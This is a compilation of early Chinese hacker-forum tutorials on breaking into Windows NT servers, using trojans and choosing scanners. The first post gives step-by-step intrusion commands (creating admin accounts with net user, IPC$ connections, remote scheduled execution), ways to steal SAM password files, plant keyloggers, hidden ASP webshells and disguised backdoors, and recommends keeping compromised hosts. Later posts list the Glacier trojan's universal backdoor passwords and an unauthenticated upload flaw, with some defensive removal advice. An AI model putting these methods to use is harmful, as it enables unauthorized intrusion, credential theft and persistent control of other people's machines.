菜鸟学习初级教程-----强烈推荐

<DIV class=tpc_content id=read_495>基础知识（6）<BR><BR><BR>net user iusr_machinename cshu （把它的密码设为cshu） <BR><BR>net localgroup administrators iusr_machinename /add（加入administrators组） <BR><BR>这样我们就拥有了iusr_machinename这一账号，admin权限，简单吧！ <BR><BR>熟悉一下net use 命令： <BR><BR>net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立连接 <BR><BR>copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 复制到机器c:\winnt\system32上，若是c$.d$,就表示c,d盘 <BR><BR>net time \\11.11.22.22 看到了时间了，比如是8点 <BR><BR>at \\11.11.22.22 8:03 haha.exe 就会在8点3分执行。 <BR><BR>net use \\11.11.22.22 /delete 断开连接 <BR><BR>应该是很简单的。这样我们就可以随心所欲地操作11.11.22.22了，admin是最高权限，所以没有限制的：） <BR><BR>是不是很简单？所以我是溢出是很厉害的攻击方法。 <BR><BR>3389知道吧！如果能进入，那么用上面的命令也可以轻易拿到admin的，不过呢，有3389漏洞的机器已经不多了。看你运气了！（本站有几篇关于3389的好文章） <BR><BR>总的来说，还是unicode的机器最多，为什么注意文明用语网管不会灭绝呢：）虽然unicode拿admin有一定难度，但还是要试试的。 <BR><BR>首先，我们检查一下unicode在这台机器上的权限，一般看读写权限和运行权限。用copy 或del命令便可确定读写权限，然后上传文件运行一下便可知道运行权限。 <BR><BR>1，如果我们可以对winnt\repair和winnt\config进行访问，sam文件就在里面（win2k里是sam，nt4里是sam._）那么用tftp 把get改成put下载下来，或者把它复制到inetpub\wwwroot下，改成zip下载。 <BR><BR>拿到sam后，用lc3破解版暴力破解吧，这种方法比较费时。 <BR><BR>2，要是有运行权限，拿就抛个木马上去吧！虽说木马可能也会没有权限，但自启动的模式在admin登陆后可能会自己提升了权限。要注意的是，最好放最新的木马，因为木马很容易被杀毒软件查杀！ <BR><BR>3，其实和2差不多，只不过变成了键盘记录器，选个国产的，一般杀毒软件不会杀出来，认真配置好后传上去，下线睡觉或是做家务去！等到网管用了机器，密码就会被纪录下来，我们在去取，admin就顺利到手了：） <BR><BR>4，getadmin和pipeupadmin，前者是nt4用的，后者是2000。看看帮助知道使用方法后（其实猜都猜得到）就可以提升一个用户的权限，有一步登天的感觉！ <BR><BR>5，手工做个bat文件，里面是建立用户等命令，然后把它放到自启动下，有很多途径：documents and settings下的开始菜单下的启动，知道了吧，至于要顺利放进去的话，会遇到空格长名等等问题，就看你的基本功了。win.ini里有load，加进去。还有便是注册表，好好研究一下regedit. <BR><BR>6，本地溢出。这个比较高深，我能告诉大家的只是，去四处找找本地溢出程序。 <BR><BR>总的来说，unicode改主页是非常简单的，但是若是要取得更高的权限，就要一番努力，上面的方法只是些思路，实际操作时需要具体处理，开动脑筋，把方法都结合起来。（是不是听起来有点玄？） <BR><BR>想想好像没有什么其他的途径要说了，什么？linux,呵呵，我还不大懂，就不在这里瞎说了。 <BR><BR>那今天就说到这里了，6里面我会说说后门制作，小问题和我的一点经验。期待吧！ <BR><BR><BR><BR>这是最后一节了，写的傻傻的，但我毕竟坚持下来了，值得鼓励！（偶尔阿q一下）在写菜鸟操的同时，我们的cshu(cshu.51.net)也在默默成长，但现在我要准备离开了，真是有点舍不得。在今后的日子里，还请大家多多支持cshu和christ,freedom他们。 <BR><BR>今天说点什么呢？没有主题，乱谈一通吧！ <BR><BR>首先我要吐一次血，当然是为了推荐一样东西，就是流光！（那么没创意，老土！）不管怎么说，小榕的流光应该是中国第一黑软，他综合了诸多的攻击手段，使攻击便捷化，当然可能让我们养成了懒惰的习惯。不会用流光的最好去学学。 <BR><BR>我来说说我自己觉得最有用的几个项目： <BR><BR>1，探测----扫描pop3/ftp/nt/sql主机，要是无目的地黑，那么用这个再合适不过了。进去后填好ip范围（范围可以扫大一点，它很快的），至于类型嘛，要是你要一大堆unicode，那么选择iis/frontpage再合适不过了，要是要更高的权限，sql是不错的选择。完成后，表格里会多出一大堆东西。 <BR><BR>remote execute-x 这是几种不同的unicode，用它比用ie来执行方便多了，但是echo有问题（是我自己不会，会的朋友快教我） <BR><BR>remote ftp pcaw file method-x 这是远程获取pc anywhere的密码文件，要使用的话，你首先要有一个ftp账号，去申请吧！顺利拿到cif文件后，用流光自带的工具就可以解开密码，很爽的！ <BR><BR>remote ftp sam -x 拿sam的，还是用最好的lc3来解吧！ <BR><BR>frontpage extended 这是frontpage扩展，不过不要高兴，是要密码的。但是若是后面跟了privilege hole的话，放声大笑吧！（小心不要让邻居拿着菜刀冲进来）打开frontpage，打开站点， <A href="http://ip/" target=_blank><FONT color=#2f5fa1>http://ip</FONT></A>就可以了！（http://不要忘） <BR><BR>此外还有一点变通，大家肯定读的懂的。 <BR><BR>2，探测----高级扫描工具。这可是流光4中的重头戏，综合了很多漏洞，还可以用plugin功能加入新的漏洞。这项功能很适合对某一站点进行探测，很快扫出漏洞后，流光会生成一个报告文件，其中包含漏洞的连接，要是你看不懂的话，建议你拿出x-scan，里面有漏洞描述的。 <BR><BR>3，工具----nt管道远程命令，种植者，这两项功能对我们攻击nt来说是相当好用的。但前提是要有账号，相信在此之前你应该有几个了吧，那就快点试试吧！ <BR><BR>总的来说，流光的使用是非常简单的，其中也有不少工具值得我们一用，tools目录里有一些很好的工具，exploit里则有很多溢出攻击程序，前提是你应该会c,不会的话我也没办法，学会c起码要看10倍于菜鸟操的资料吧！另外给大家推荐一个站点：<A href="http://www.hack.co.za/" target=_blank><FONT color=#2f5fa1>www.hack.co.za</FONT></A>，有什么漏洞的话就去那里找找，你会有所收获的。 <BR><BR><BR>然后我想说说一些黑站的经验。 <BR><BR>☆当我们用unicode控制一台机器时，我向大家推荐用asp木马，阿新的改良版，本站有下载的。上传asp文件前不要忘了修改list.asp中的地址信息，最好也放一个cmd.asp上去，运气好的话，可以运行命令的。 <BR><BR>上传好后，ie里输入其中index.asp的地址，呵呵，我们就能方便地管理其中的文件了，可以改网页，改代码，上传脚本文件麻烦？那就用它来生成吧！ <BR><BR>推荐他的最大原因便是----便于隐藏！一般网站总有一个庞大的目录，选择一个深的，放进去，网管很难发现的：） <BR><BR>最后对大家说一句，要是有备份目录（很多网站都有的），最好也放一份进去。有一次我用这个东西修改一家网站的首页，改了两三次网管也没删掉，可是突然一天不行了，原来他用了备份的网页（还算机灵吧） <BR><BR>☆我想对大家说，对于国内网站，最好不要恶意去攻击，因为我们是中国人嘛！在5/1期间，我发现有一些国内站点被黑，留下的页面上不是poison box，而是中国人的话，这真是无耻到了极点！！！！大家千万不要学哦。还有，现在网上有很多还没有网页的主机，往往有很多漏洞，对于这种机器，竟有一些小人也会去改收页（比如上海那个姓杨的小子）这算什么？显示实力，炫耀技术？呵呵，见鬼去吧！ <BR><BR>我的建议是，不要改它的首页，而是努力去拿admin,控制它，这样我们有很多选择：肉鸡，等它有正式主页后可以黑，或者把我们的主页放上去！比申请好多了，权限又足！当然很危险：）这样做是不是有品位多了？ <BR><BR>☆要是我们拿到了admin，但有时却不能执行一些命令，那很可能是因为服务启动的问题。试着用以下命令： <BR><BR>net start termservice 启动win2k的终端控制 <BR><BR>net start workstation 打开net use 功能 <BR><BR>net start lanmanserver 打开ipc <BR><BR>net start eventlog 启动日志（你不会那么傻吧！stop） <BR><BR>net start schedule 打开计划(at) <BR><BR>net start server 共享 <BR><BR>还有很多，net命令里去找吧！ <BR><BR>☆打开telnet <BR><BR>1，远程去运行ntlm.exe，流光里有 <BR><BR>2，net stop telnet <BR><BR>3, net start telnet <BR><BR>☆我推荐几种后门：winshell（默认端口5277）相对于srv，它好一些。remotenc这个是榕哥的作品，可以以指定用户执行，还可以自己起服务的名字，很棒的！ <BR><BR>至于服务的名字，建议大家去看看win2k的进程名，学着起相类似的名字，要做到使网管看到了也不会引起警觉，或是有警觉也不敢去删，呵呵，这样就最好了！ <BR><BR>☆代理问题。我推荐大家自己去做代理，控制了一台机器后，用snake前辈写的skserver去做个sock5。 <BR><BR>具体做法就不详细说了，因为比较普通，只要熟悉一下用法就可以了。 <BR><BR>做好了sock5，我们可以上oicq，下棋都用它，sock5代理可是很少见的哦！ <BR><BR>要是实在拿不到sock5,用http也可以，这里推荐一个软件tcp2http，它具有很多功能。在给个站点：dzc.126.com国内最最好的的代理站点，怕死的朋友千万不要错过。 <BR><BR>最后说说一些对于菜鸟同志的建议： <BR><BR>不要把黑当作一种显示自己的行为，要是你想耍威风，用url欺骗来骗mm最合适了，还可以弄个yahoo什么的…… <BR><BR>不要在一项技术上停留过长时间，当你熟练掌握后，应该迅速学习下一个新技术。 <BR><BR>不要和被你黑的网管过多接触，前车之鉴哦。 <BR><BR>对于一台好机器要做好后门，不要轻易失去它。 <BR><BR>想好好学黑客的话，就常去各大论坛转转，仔细读教程，忘记聊天室和网络游戏吧！ <BR><BR>实践是最好的教程，再次重申！ <BR><BR>应该多学计算机的其他方面的知识，任何知识在一定场合都是有用的。 <BR><BR>编程技术……好像太难了，不过再难也要学。 <BR><BR>想不出来了……………… <BR><BR>好了，我们的菜鸟操终于结束了，我这个大菜鸟也可以退休了，拼搏一年后我会回来的。第一节里我曾许诺让大家学会黑站，不知道大家是否成功了，不管这么样，我们都该不断的努力学习，不是吗?</DIV>

<DIV class=tpc_content id=read_496>黑客常用兵器之木马篇（上）<BR><BR><BR>“我知道远程控制是种武器，在十八般兵器中名列第七，木马呢?” <BR>　　“木马也是种武器，也是远程控制。” <BR>　　“既然是远程控制，为什么要叫做木马？” <BR>　　“因为这个远程控制，无论控制了什么都会造成离别。如果它钩住你的E-Mail，你的E-Mail就要和你离别；如果它钩住你的QQ，你的QQ就要和你离别。” <BR>　　“如果它钩住我的机器，我就和整个网络离别了?” <BR>　　“是的。” <BR>　　“你为什么要用如此残酷的武器?” <BR>　　“因为我不愿被人强迫与我所爱的人离别。” <BR>　　“我明白你的意思了。” <BR>　　“你真的明白?” <BR>　　“你用木马，只不过为了要相聚。” <BR>　　“是的。” <BR><BR>　　一 <BR><BR>　　在众多的黑客武器中特洛伊木马（Trojan horse）这种攻击性武器无论是菜鸟级的黑客爱好，还时研究网络安全的高手，都视为最爱。虽然有的时候高手将木马视为卑鄙的手段。但是作为最为有效的攻击工具，木马的威力要比其他的黑客工具大得多。 <BR><BR>　　“木马既然如此有效，为何在Hacker兵器谱中排名靠后？” <BR><BR>　　“因为使用木马往往不是很光明正大。” <BR><BR>　　“哦？为何？” <BR><BR>　　“在使用木马的人群中菜鸟黑客居多，他们往往接触网络不久，对黑客技术很感兴趣，很想向众人和朋友显示一番，但是去驾驭技术不高，不能采取别的方法攻击。于是木马这种半自动的傻瓜式且非常有效的攻击软件成为了他们的最爱。而且随着国产化的木马不断的出现，多数黑客的入门攻击几乎无一例外都是使用木马。当然对于那些黑客老手来说他们也并不是不使用木马了，他们通常会在得到一个服务器权限的时候植入自己编写的木马，以便将来随时方便进出这台服务器。” <BR><BR>　　“但如此一来木马的名声不就随之降低了吗？” <BR><BR>　　“是的，所以现在的黑客高手都耻于用木马，更耻于黑个人的计算机。” <BR><BR>　　“不过木马在很多人的眼中仍然是一等一的绝好兵器。” <BR>在众多的木马之中Cult of Dead Cow开发的Back Orific2000应该算是名气比较大的一个。这款软件是在Back Orific2.1的基础之上开发的，但是他最大的改动就是增加了对Windows NT服务器系列的支持。作为微软的高端产品，BO2000的这个功能无疑对Windows NT来说是致命的，就Windows NT本身而言，由于硬盘采取了NTSF的加密，普通的木马，包括冰河也无法控制，当然要想要让多数木马无法对Windows NT发挥作用最好将Windows NT转化为NTSF的格式下才会比较好用一些。 <BR><BR>　　而正因为如此BO2000才深得黑客高手的喜爱，因为他们感兴趣的也只有服务器，也只有Web Server才能够提起他们的胃口，那是一种来自深层感官的刺激。 <BR><BR>　　通常情况下木马大致可分为两个部分：服务器端程序和客户端程序。服务器端通常就是被控制端，也是我们传统概念上的木马了。 <BR><BR>　　二 <BR><BR>　　“你说BO2000好，但是绝大多数的杀毒招数都能够沟将其制服，而且我感觉他在使用上不如我手里的冰河锐利，况且我也不想黑什么服务器。我认为，个人电脑中隐藏有更大的宝藏，而且个人电脑脆弱的我能够利用任何一种方法摧毁它。 <BR><BR>　　“你说的很对，冰河确实锐利，而且称霸中华江湖一年之久，也可谓武林中少见的好兵刃，但是兵器虽然锋利，但兵器在打造的时候却留下来一个致命的缺点，这也是木马冰河为何在武林衰败的原因。” <BR><BR>　　“这是一个什么样的弱点那？竟然如此致命？” <BR><BR>　　“呵呵，说白了也很简单，冰河的作者在打造冰河2.X版本时就给它留下了一个后门，这个后门其实就是一个万能密码，只要拥有此密码，即便你中的冰河加了密码保护，到时候仍然行同虚设。” <BR><BR>　　“什么！真有此事？想我许多朋友还因为冰河好用把它当作了一个免费的远程控制程序来用，如此这般，他们的机子岂不暴露无遗？” <BR><BR>　　“呵呵，在黑客中瞒天过海、借花献佛这些阴险的招数都不算什么，多数木马软件的作者为了扩大自己的势力范围和争取主动权都会留一手，致命的一招。冰河的作者当然也不例外，而且由于作者钟爱许美静，所以每一个冰河中都包含许美静的歌词。当然作者为自己以后行事方便也留了几个万能密码。” <BR><BR>　　“噢？万能密码？” <BR><BR>　　“通常黑客在植入冰河这种木马的时候，为了维护自己的领地通常的要为自己的猎物加一个密码，只有输入正确的密码你才能够正常的控制对方的计算机，但是冰河的打造者为了方便自己的使用在冰河中加入了一个万能的密码，就像万能钥匙一样。冰河各版本的通用密码： <BR><BR>　　2.2版：Can you speak Chinese? <BR>　　2.2版：05181977 <BR>　　3.0版：yzkzero! <BR>　　4.0版：05181977 <BR>　　3.0版：yzkzero.51.net <BR>　　3.0版：yzkzero! <BR>　　3.1-netbug版密码: 123456!@ <BR>　　2.2杀手专版：05181977 <BR>　　2.2杀手专版：dzq20000! <BR><BR>你可以试试看，是不是很轻松的就能够进入任何一台有冰河服务器端的电脑？” <BR><BR>　　“真的进入了，果然有此事情，怪不得现在很多人都不再使用冰河。” <BR><BR>　　“此外冰河还存在着两个严重的漏洞： <BR><BR>　　漏洞一：不需要密码远程运行本地文件漏洞。 <BR><BR>　　具体的操作方法如下：我们选择使用相应的冰河客户端，2.2版以上服务端用2.2版客户端，1.2版服务端需要使用1.2版客户端控制。打开客户端程序G_Client，进入文件管理器，展开“我的电脑”选中任一个本地文件按右键弹出选择菜单，选择“远程打开”这时会报告口令错误，但是文件一样能上传并运行。 <BR><BR>　　任何人都可以利用这个漏洞上传一个冰河服务端就可以轻松获得机器的生死权限了，如果你高兴的话，还可以上传病毒和其它的木马。 <BR><BR>　　漏洞二：不需要密码就能用发送信息命令发送信息，不是用冰河信使，而是用控制类命令的发发送信息命令。” <BR><BR>　　“当然这的确是一个原因，但更主要的是现在的多数杀毒软件都能克制冰河。” <BR><BR>　　三 <BR><BR>　　木马通常会在三个地方做手脚：注册表、win.ini、system.ini。这三个文件都是电脑启动的时候需要加载到系统的重要文件，绝大部分木马使用这三种方式进行随机启动。当然也有利用捆绑软件方式启动的木马，木马phAse 1.0版本和NetBus 1.53版本就可以以捆绑方式装到目标电脑上，可以捆绑到启动程序上，也可以捆绑到一般程序的常用程序上。如果木马捆绑到一般的程序上，启动是不确定的，这要看目标电脑主人了，如果他不运行，木马就不会进入内存。捆绑方式是一种手动的安装方式，一般捆绑的是非自动方式启动的木马。非捆绑方式的木马因为会在注册表等位置留下痕迹，所以，很容易被发现，而捆绑木马可以由黑客自己确定捆绑方式、捆绑位置、捆绑程序等，位置的多变使木马有很强的隐蔽性。 <BR><BR>　　“在众多木马中，大多数都会将自己隐藏在Windows系统下面，通常为C:\Windows\目录或者C:\Windows\system\与C:\Windows\system32下隐藏。” <BR><BR>　　“众多的目录中为何选择这两个目录？” <BR><BR>　　“呵呵，当然是为了便于隐蔽。通常这几个目录为计算机的系统目录，其中的文件数量多而繁杂，很不容易辨别哪些是良性程序哪些是恶性程序，即便高手往往也会有失误删除的情况。而且，即便放置在系统目录下，就多数为重要的文件，这些文件的误删除往往会直接导致系统严重的瘫痪。” <BR><BR>　　“原来如此。” <BR><BR>　　“前辈，木马冰河是否也做了这些手脚？” <BR><BR>　　“这是自然，木马一旦被植入目标计算机中要做的最重要的事就是如何在每次用户启动时自动装载服务端。冰河也是如此了。首先，冰河会在你的注册表中的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run和RUNSERVICE 键值中加上了\kernl32.exe(是系统目录)， <BR><BR>　　§c:\改动前的RUN下 <BR>　　默认="" <BR>　　§c:\改动后的RUN下 <BR>　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" <BR>　　§c:\改动前RunServices下 <BR>　　默认="" <BR>　　§c:\改动后RunServices下 <BR>　　默认="C:\\WINDOWS\\SYSTEM\\Kernel32.exe" <BR>　　§c:\改动前[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： <BR>　　默认="Notepad.exe %1" <BR>　　§c:\改动后[　　HKEY_LOCAL_MACHINE\Software\CLASSES\txtfile\shell\open\command]的： <BR>　　默认="C:\\WINDOWS\\SYSTEM\\Sysexplr.exe %1" <BR><BR>可以看出之所以冰河可以自我恢复主要靠的是C:\\WINDOWS\\SYSTEM\\Sysexplr.exe，而且冰河服务器端的编制是加密的，没法简单的通过改注册表得到或换掉。另外值得一提的是，即便你删除了这个键值，也并非平安大吉，冰河还会随时出来给你捣乱，主要因为冰河的服务端也会在c:\windows目录下生成一个叫 sysexplr.exe文件，当然这个目录会随你windows的安装目录变化而变化。 <BR>　 <BR>　　“这个文件名好像超级解霸啊，冰河竟然如此狠毒。” <BR><BR>　　“哈哈哈哈，你说的很对，也很聪明，这个文件的确很像超级解霸，但是这还是不够称得上为阴险，最为阴险的是这个文件是与文本文件相关联的，只要你打开文本，sysexplr.exe程序就会重新生成一个krnel32.exe，此时你的电脑还是被冰河控制著。而且如果你失误将sysexplr.exe程序破坏，你计算机的文本文件将无法打开。” <BR><BR>　　木马都会很注意自己的端口，多达六万多中的端口很容易让我们迷失其中，如果你留意的话就会发现，通常情况下木马端口一般都在1000以上，并朝着越来越大的趋势发展。这主要是因为1000以下的端口是常用端口，况且用时占用这些端口可能会造成系统不正常，木马也就会很容易暴露；此外使用大的端口也会让你比较难发现隐藏其中的木马，如果使用远程扫描端口的方式查找木马，端口数越大，需要扫描的时间也就越多，故而使用诸如8765的端口会让你很难发现隐藏在其中的木马。 <BR><BR>　　四 <BR><BR>　　“既然木马如此的阴险，那么前辈有何可知木马的方法啊？” <BR><BR>　　“现在的木马虽然阴险，但终究逃不过几个道理。平时出名的木马，杀毒软件就多数能够对付。但是现在木马种类繁多，有很多杀毒软件对付不了的。但是，只要我们谨记一下几个方法，就能够手到擒来。” <BR><BR>　　“首先，我们可以选择端口扫描来进行判断，因为木马在被植入计算机后会打开计算机的端口，我们可以根据端口列表对计算机的端口进行分析。此外，查看连接也是一种好办法，而且在本地机上通过netstat -a（或某个第三方的程序）查看所有的TCP/UDP连接，查看连接要比端口扫描快，而且可以直观地发现与我们计算机连接的有哪些IP地址。当然，如果你对系统很熟悉的话，也可以通过检查注册表来进行木马的杀除，但是这个方法不适合于那些菜鸟级用户。查找木马特征文件也是一种好方法，就拿冰河来说……” <BR><BR>　　“这个我知道前辈，木马冰河的特征文件一定是G_Server.exe。” <BR><BR>　　“那有这么简单。冰河植入计算机后真正的特征文件是kernl32.exe和sysexlpr.exe。” <BR><BR>　　“太狠毒了，一个跟系统内核文件一样，一个又像超级解霸。那么前辈我们把这两个文件删除掉，这冰河岂不就消失了。” <BR><BR>　　“的确，你要是在DOS模式下删除了他们，冰河就被破坏掉了，但是你的计算机随之会无法打开文本文件，因为你删除的sysexplr.exe文件是和文本文件关联的，你还必须把文本文件跟notepad关联上。修改注册表太危险，你可以在Windows资源管理器中选择查看菜单的文件夹选项，再选择文件类型进行编辑。不过最简单的方法是按住键盘上的SHIFT键的同时鼠标右击任何一个TXT为后缀的文本文件，再选择打开方式，选中〖始终用该程序打开〗，然后找到notepad一项，选择打开就可以了。” <BR><BR>　　“哈哈，按照前辈这么说来，我们只要抓住了这特征，天下的木马也奈何不了我们了。”</DIV>

<DIV class=tpc_content id=read_497>黑客常用兵器之木马篇（下）<BR><BR><BR>　五 <BR><BR>　　“哈哈，你可知道除了冰河这样的木马经常使用的隐身技术外，更新、更隐蔽的方法已经出现，这就是―驱动程序及动态链接库技术。驱动程序及动态链接库技术和一般的木马不同，它基本上摆脱了原有的木马模式―监听端口，而采用替代系统功能的方法改写驱动程序或动态链接库。这样做的结果是：系统中没有增加新的文件所以不能用扫描的方法查杀、不需要打开新的端口所以不能用端口监视的方法进行查杀、没有新的进程所以使用进程查看的方法发现不了它，也不能用kill进程的方法终止它的运行。在正常运行时木马几乎没有任何的症状，而一旦木马的控制端向被控端发出特定的信息后，隐藏的程序就立即开始运作。此类木马通过改写vxd文件建立隐藏共享的木马，甚是隐蔽，我们上面的那些方法根本不会对这类木马起作用。 <BR><BR>　　“可是前辈说的这种木马晚生并没有见到啊。” <BR><BR>笨蛋！你没有见过，你怎么知道我老人家也没有见过？告诉你我已经看到了一个更加巧妙的木马，它就是Share。运行Share木马之前，我先把注册表以及所有硬盘上的文件数量、结构用一个监控软件DiskState记录了起来，这个监控软件使用128bit MD5的技术来捕获所有文件的状态，系统中的任何文件的变动都逃不过他的监视，这个软件均会将它们一一指出。” <BR><BR>　　“前辈我这里第一次运行Share后，系统好像没有动静，使用Dllshow（内存进程察看软件）观看内存进程，似乎也没有太大的变化。一般木马都会马上在内存驻留的，或许此木马修改了硬盘上的文件。” <BR><BR>　　“好，那么你就接着用DiskState比较运行share.exe前后的记录。” <BR><BR>　　“程序显示windows\applog里面的目录的一些文件和system.dat、user.dat文件起了变化，并没有其他文件的增加和修改。” <BR><BR>　　“系统中的applog目录里面存放了所有应用程序函数和程序调用的情况，而system.dat和user.dat则是组册表的组成文件。你把applog目录里面的share.lgc打开来观看，它的调用过程是什么？” <BR><BR>　　“调用过程如下： <BR><BR>　　c15625a0 92110 "C:\WINDOWS\SYSTEM\OLEAUT32.DLL" <BR>　　c1561d40 c1000 "C:\WINDOWS\SYSTEM\OLE32.DLL" <BR>　　c1553520 6000 "C:\WINDOWS\SYSTEM\INDICDLL.DLL" <BR>　　c15d4fd0 2623 "C:\WINDOWS\WIN.INI" <BR>　　c15645b0 8000 "C:\WINDOWS\SYSTEM\SVRAPI.DLL" <BR>　　c1554190 f000 "C:\WINDOWS\SYSTEM\MPR.DLL" <BR>　　c154d180 a1207 "C:\WINDOWS\SYSTEM\USER.EXE" <BR>　　c1555ef0 13000 "C:\WINDOWS\SYSTEM\MSNET32.DLL" <BR><BR>　　但是为什么前辈我们看不到MSWINSCK.OCX或WSOCK2.VXD的调用呢？如果木马想要进行网络通讯，是会使用一些socket调用的。” <BR><BR>　　“那么接着你再观察注册表的变化。” <BR>　　“好像在HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面，多了几个键值，分别是CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$，其内部键值如下： <BR><BR>　　"Flags"=dword:00000302 <BR>　　"Type"=dword:00000000 <BR>　　"Path"="A:\\" 《-----路径是A到F <BR>　　"Parm2enc"=hex: <BR>　　"Parm1enc"=hex: <BR>　　"Remark"="黑客帝国" <BR>　　” <BR>　　“这就对了，然后你在浏览器的地址栏输入\\111.111.111.1\CJT_C$。” <BR><BR>　　“啊！居然把我的C盘目录文件显示出来了。” <BR>　　“现在你把CJT_C$改成matrix然后重启计算机，接着在浏览器的地址栏输入\\111.111.111.1\matrix。” <BR><BR>　　“前辈也显示C盘目录文件了，很奇怪的是，在我的电脑里面硬盘看上去并没有共享啊？” <BR>　　“哈哈，那你再把"Flags"=dword:00000302的302改成402，reboot计算机。” <BR><BR>　　“嘻嘻，硬盘共享已显示出来了。那么如何防止这种木马那？” <BR>“哈哈哈哈，这种木马只不过用了一个巧妙的方法隐藏起来而已。你现在把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的CJT_A$、CJT_C$、CJT_D$、CJT_E$、CJT_F$全部删掉。如果你还放心不下，也可以把windows\system\下面的Vserver.vxd（Microsoft 网络上的文件与打印机共享，虚拟设备驱动程序）删掉，再把[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的VSERVER键值删掉。这样就可以了。另外，对于驱动程序/动态链接库木马，有一种方法可以试试，使用Windows的〖系统文件检查器〗，通过〖开始菜单〗－〖程序〗－〖附件〗－〖系统工具〗－〖系统信息〗－〖工具〗可以运行〖系统文件检查器〗，用〖系统文件检查器〗可检测操作系统文件的完整性，如果这些文件损坏，检查器可以将其还原，检查器还可以从安装盘中解压缩已压缩的文件。如果你的驱动程序或动态链接库在你没有升级它们的情况下被改动了，就有可能是木马，提取改动过的文件可以保证你的系统安全和稳定。” <BR><BR>　　六 <BR><BR>　　“此外很多人中木马都会采用如下手段： <BR><BR>　　1．先跟你套近乎，冒充成漂亮的美眉或者其他的能让你轻信的人，然后想方设法的骗你点他发给你的木马。 <BR><BR>　　2．把木马用工具和其它的软件捆绑在一起，然后在对文件名字进行修改，然后修改图标，利用这些虚假的伪装欺骗麻痹大意的人。 <BR><BR>　　3．另外一种方法就是把木马伪装好后，放在软件下载站中，着收渔翁之利。 <BR><BR>　　所以我这里提醒你一些常见的问题，首先是不要随便从小的个人网站上下载软件，要下也要到比较有名、比较有信誉的站点，通常这些网站的软件比较安全。其次不要过于相信别人，不能随便运行别人给的软件。而且要经常检查自己的系统文件、注册表、端口等，而且多注意些安全方面的信息。再者就是改掉windows关于隐藏文件后缀名的默认设置，这样可以让我们看清楚文件真正的后缀名字。最后要提醒你的是，如果有一天你突然发现自己的计算机硬盘莫名其妙的工作，或者在没有打开任何连接的情况下，猫还在眨眼睛，就立刻断线，进行木马的搜索。”</DIV>

<DIV class=tpc_content id=read_498>黑客常用兵器之扫面篇（上）<BR><BR>刀，兵器谱上排名第六。 <BR>　　刀； <BR>　　一把好刀，光亮如雪； <BR>　　刃； <BR>　　一抹利刃，吹发即断； <BR><BR>　　黑客手中的扫描器如同刺客手中之刀，杀人、保命；攻击、补漏。 <BR><BR>　　如果一个黑客手中没有一两个扫描器，那么他算不上是一个黑客，至少他是一个手里没有“刀”的黑客。没有“刀”的黑客是难以生存的……】 <BR><BR>　　“前辈，您为何如此看好扫描器？为什么黑客必须要有扫描器？” <BR><BR>　　“后生，你上次木马害我不浅，你这次又像搞什么花样？” <BR><BR>　　“上次小生只是跟前辈开了一个玩笑，还望前辈见谅。” <BR><BR>　　“罢了，我老人家还不止于和你如此一般见识。此次你又有什么不清楚的？” <BR><BR>　　“我不太清楚扫描器为何会像您所说的有如此大的威力，扫描器在黑客攻击中能起到什么作用？” <BR><BR>　　“看来你现在也是一个手里没有刀的黑客，扫描器在一个成熟的黑客手里有着相当大的作用。因为进化到会用扫描器一级的黑客，他们就会很少有人在对那些无知的个人用户感兴趣，注意力更多的被吸引到了服务器上。而对付服务器最好的方法就是找到服务器系统的漏洞，或者服务器相关软件的漏洞。对于传统的手工查找来说，不但查找漏洞的速度过于缓慢，而且多数情况下只能针对某一个特定的漏洞，感觉有点大海捞针的味道。而扫描器就是一种快速寻找服务器系统相关漏洞的工具，通过它们，黑客可以根据自己的带宽和系统情况，以他们自己喜欢的速度和方式来快速的寻找系统漏洞，而且这多数扫描器可以同时扫描多种漏洞，很容易找到系统的漏洞和弱点，此时黑客就可以根据扫描器提供的漏洞报告和信息，采用合适的攻击方法对目标给以致命的一击。” <BR><BR>　　“前辈，那我如何找到扫描器，平时我好像很少接触到这些东西啊。” <BR><BR>　　“呵呵，你用过小榕的流光系列吗？” <BR><BR>　　“这个当然是接触过了。” <BR><BR>　　“其实小榕的流光就是一款结合强大扫描功能的软件，只不过他在流光中加入了一些攻击和破解成份。” <BR><BR>“扫描器果然强大，我就曾用流光攻破过许多的黄色和反动网站，特别是他的FTP和新加入的SQLCMD功能，非常的强大。而且界面非常的友好，让我这种菜鸟用户很容易上手。” <BR><BR><BR><BR>　　“你说的不错，但是虽然小榕的流光非常出色，并兼备强大的破解和攻击成份，但是总的来说它不能算的上是一个真正的扫描器。而且流光主要体现在破解，攻击性很强，没有太多的对目标系统扫描后的分析报告，所以流光在我看来只能算是是一个涵盖扫描功能的强大破解软件。” <BR><BR>　　“那么在前辈的眼中，什么样的软件是一个强大的扫描软件，什么样的扫描器才能成为黑客手中的屠龙刀？” <BR><BR>　　“一个好的扫描器必须有简洁和易于使用的操作界面，强大的分析和扫描信息范围，对最新漏洞的扫描判断能力（也就是通常所说的升级概念），详细的分析结果报告和对漏洞的描述与对策。这样的“刀”才能算的上是黑客手中的一把宝刀。” <BR><BR>　　“前辈能否给我点评一下如今最为流行的扫描器的特点和性能呢？” <BR><BR>　　“说道当今网络安全界流行的扫描器，其中最为优秀的就要算是ISS公司出品的商业扫描器了。它能针对上千种的系统和软件漏洞对服务器作出全面的细微扫描，而且能够生成比较详细的扫描报告，应该说是先进最好的扫描器了。” <BR><BR>　　“前辈这个扫描器我可以从什么地方下载？” <BR><BR>　　“无知！商业扫描器，当然是不能免费下载的了，你要花钱去买！” <BR><BR>　　“还需要花钱啊，哪有没有不花钱的扫描器呢？” <BR><BR>　　“当然有了，扫描器是黑客必备的工具之一，要是都花钱去买那不符合黑客的风格。我们可以在网上找到很多免费的而且同样很优秀的黑客扫描器。在国外比较常用的有Cerberus Internet Scanner简称CIS，还有乌克兰SATAN。我们国内的也有安全焦点的X-Scanner，与小榕的流光。” <BR><BR>　　“前辈说的这几种扫描器我只用过流光，我个人认为流光很出色，其他的扫描器也只有所耳闻，但不知道有什么特点，还请前辈赐教。” <BR><BR>　　